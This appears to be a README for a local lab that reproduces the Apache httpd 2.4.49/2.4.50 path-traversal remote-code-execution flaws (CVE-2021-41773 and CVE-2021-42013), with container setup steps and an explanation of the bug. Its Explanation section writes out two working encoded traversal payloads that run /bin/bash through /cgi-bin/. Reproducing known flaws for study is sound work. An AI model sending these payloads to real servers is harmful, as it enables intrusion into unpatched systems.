## https://sploitus.com/exploit?id=D10426F3-DF82-5439-AC3E-6CA0A1365A09
# Apache httpd RCE

A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside these directories are not protected by the default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was incomplete, see CVE-2021-42013.

- [CVE Details](https://www.cvedetails.com/cve/CVE-2021-41773/)
- [Source](https://packetstormsecurity.com/files/164418/Apache-HTTP-Server-2.4.49-Path-Traversal-Remote-Code-Execution.html)

## Affected Version(s)

- 2.4.49
- 2.4.50

## Fixed in Version(s)

- 2.4.51

## Prerequisites

- podman (or docker, with `alias podman=docker` so the scripts find it)
- python3 and pip3
- colorama (Python library, install with `pip3 install colorama`)

## Files

- [httpd.conf](httpd.conf) the default Apache configuration, with the CGI module enabled
- [hello.pl](hello.pl) an example hello-world `perl` CGI script running in the container(s)
- [main.py](main.py) the example exploit script (Python)

## Reproduction

Start a vulnerable Apache httpd (with default configuration) as a docker/podman container.

| Dockerfile     | Container      | Version |
|:--------------:|:--------------:|:-------:|
| Dockerfile2449 | vulnapache2449 | 2.4.49  |
| Dockerfile2450 | vulnapache2450 | 2.4.50  |

1. Build both container images
1.1 chmod +x ./build.sh
1.2 ./build.sh
2. Start vulnerable Apache httpd Containers
2.1 chmod +x ./run.sh
2.2 ./run.sh
3. Verify the web server is running
3.1 `curl localhost:2449/cgi-bin/hello.pl`
3.2 `curl localhost:2450/cgi-bin/hello.pl`

| Container      | Listen Port |
|:--------------:|:-----------:|
| vulnapache2449 | 2449        |
| vulnapache2450 | 2450        |

4. Run the exploit script
4.1 `python3 main.py localhost:2449`
4.2 select attack on version 2.4.49
4.3 `python3 main.py localhost:2450`
4.4 select attack on version 2.4.50

![Exploitation Example](exploitation-sample.png)

## Explanation

The exploit uses Apache httpd's CGI module: the `/cgi-bin/` ScriptAlias is escaped with an encoded `../` sequence that path normalization fails to reject, so an arbitrary executable outside the aliased directory (here `/bin/bash`) is mapped and run as a CGI program.

- `/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash`
- `/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash`

`.%2e/` is single URL-encoded: `%2e` decodes to `.`, so the segment becomes `../`. This is the form 2.4.49 lets through (CVE-2021-41773).
`.%%32%65/` is double URL-encoded: a first decode turns `%%32%65` into `%2e`, a second decode turns that into `.`, giving `../` again. The 2.4.50 fix rejects the single-encoded form but not this one (CVE-2021-42013).

## Credits

- Exploit Author: Valentin Lobstein
- Software Link: https://github.com/Balgogan/CVE-2021-41773
- Lucas Schnell